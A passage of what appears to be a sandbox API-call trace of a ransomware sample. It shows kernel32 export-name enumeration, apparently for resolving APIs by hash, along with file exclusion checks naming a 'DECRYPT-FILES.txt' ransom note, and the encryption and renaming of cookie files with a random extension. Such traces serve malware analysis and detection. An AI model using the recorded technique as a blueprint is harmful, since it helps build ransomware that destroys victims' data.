(lpString="CREATETHREADPOOLWORK") returned 20 [0079.559] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0079.559] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0079.559] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0079.559] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0079.559] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0079.559] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0079.559] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0079.559] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0079.559] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0079.559] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0079.559] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0079.559] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0079.559] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0079.559] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0079.559] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0079.559] lstrlenA (lpString="CTRLROUTINE") returned 11 [0079.559] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0079.559] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0079.559] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0079.559] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0079.559] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0079.559] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0079.559] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0079.559] lstrlenA (lpString="DEBUGBREAK") returned 10 [0079.559] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0079.559] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0079.559] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0079.559] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0079.559] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0079.560] lstrlenA (lpString="DECODEPOINTER") returned 13 [0079.560] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0079.560] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0079.560] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0079.560] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0079.560] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0079.560] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0079.560] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0079.560] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0079.560] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0079.560] lstrlenA (lpString="DELETEATOM") returned 10 [0079.560] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0079.560] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0079.560] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0079.560] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0079.560] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0079.560] lstrlenA (lpString="DELETEFIBER") returned 11 [0079.560] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0079.560] lstrlenA (lpString="DELETEFILEA") returned 11 [0079.560] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0079.560] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0079.560] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0079.560] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0079.560] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0079.560] lstrlenA (lpString="DELETEFILEW") returned 11 [0079.560] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0079.560] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0079.560] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0079.560] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0079.560] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0079.560] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0079.560] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0079.560] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0079.560] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0079.560] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0079.560] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0079.561] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0079.561] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0079.561] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0079.561] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0079.561] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0079.561] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0079.561] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0079.561] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0079.561] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0079.561] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0079.561] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0079.561] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0079.561] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0079.561] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0079.561] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0079.561] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0079.561] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0079.561] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0079.561] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0079.561] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0079.561] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0079.561] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0079.561] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0079.561] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0079.561] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0079.561] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0079.561] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0079.561] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0079.561] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0079.561] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0079.561] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0079.561] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0079.561] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0079.561] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0079.561] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0079.561] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0079.562] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0079.562] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0079.562] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0079.562] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0079.562] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0079.562] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0079.562] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0079.562] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0079.562] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0079.562] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0079.562] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0079.562] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0079.562] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0079.562] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0079.562] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0079.562] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0079.562] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0079.562] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0079.562] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0079.562] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0079.562] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0079.562] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt") returned 121 [0079.562] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt.xbAIFa") returned 128 [0079.562] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt.xbAIFa" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@scorecardresearch[2].txt.xbaifa"), dwFlags=0x0) returned 1 [0079.563] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.563] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.564] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.564] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbf73d210, ftCreationTime.dwHighDateTime=0x1d2faf2, ftLastAccessTime.dwLowDateTime=0xbf73d210, ftLastAccessTime.dwHighDateTime=0x1d2faf2, ftLastWriteTime.dwLowDateTime=0xbf73d210, ftLastWriteTime.dwHighDateTime=0x1d2faf2, nFileSizeHigh=0x0, nFileSizeLow=0x6c, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt", cAlternateFileName="5P4910~1.TXT")) returned 1 [0079.564] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt", lpString2="DECRYPT-FILES.txt") returned -1 [0079.564] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt", lpString2="autorun.inf") returned -1 [0079.564] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt", lpString2="boot.ini") returned -1 [0079.564] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt", lpString2="desktop.ini") returned -1 [0079.564] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt", lpString2="ntuser.dat") returned -1 [0079.564] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt", lpString2="iconcache.db") returned -1 [0079.564] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt", lpString2="bootsect.bak") returned -1 [0079.564] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt", lpString2="ntuser.dat.log") returned -1 [0079.564] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt", lpString2="thumbs.db") returned -1 [0079.564] lstrcmpiW (lpString1="5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt", lpString2="Bootfont.bin") returned -1 [0079.564] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt") returned 44 [0079.564] lstrcmpiW (lpString1="txt", lpString2="lnk") returned 1 [0079.564] lstrcmpiW (lpString1="txt", lpString2="exe") returned 1 [0079.564] lstrcmpiW (lpString1="txt", lpString2="sys") returned 1 [0079.564] lstrcmpiW (lpString1="txt", lpString2="dll") returned 1 [0079.564] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0079.564] lstrlenW (lpString="5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt") returned 44 [0079.564] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0079.564] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt" [0079.564] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.565] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@server.adformdsp[1].txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0079.565] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=108) returned 1 [0079.565] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0079.565] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0079.565] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0079.565] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0079.565] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.567] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0079.567] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0079.567] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.567] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0079.568] CloseHandle (hObject=0x464) returned 1 [0079.568] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.568] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0079.569] CloseHandle (hObject=0x0) returned 0 [0079.569] CloseHandle (hObject=0x460) returned 1 [0079.569] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.570] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.570] GetTickCount () returned 0x114c61d [0079.570] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.570] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0079.570] VirtualAlloc (lpAddress=0x0, dwSize=0x10, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0079.570] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.571] lstrlenA (lpString="kernel32.dll") returned 12 [0079.571] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0079.571] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0079.571] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0079.571] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0079.571] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0079.571] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0079.571] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0079.571] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0079.571] lstrlenA (lpString="ADDATOMA") returned 8 [0079.571] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0079.571] lstrlenA (lpString="ADDATOMW") returned 8 [0079.571] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0079.571] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0079.571] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0079.571] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0079.571] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0079.571] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0079.571] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0079.571] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0079.571] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0079.571] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0079.571] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0079.572] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0079.572] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0079.572] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0079.572] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0079.572] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0079.572] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0079.572] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0079.572] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0079.572] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0079.572] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0079.572] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0079.572] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0079.572] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0079.572] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0079.572] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0079.572] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0079.572] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0079.572] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0079.572] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0079.572] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0079.572] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0079.572] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0079.572] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0079.572] lstrcpyA (in: lpString1=0x3f2c7fc, 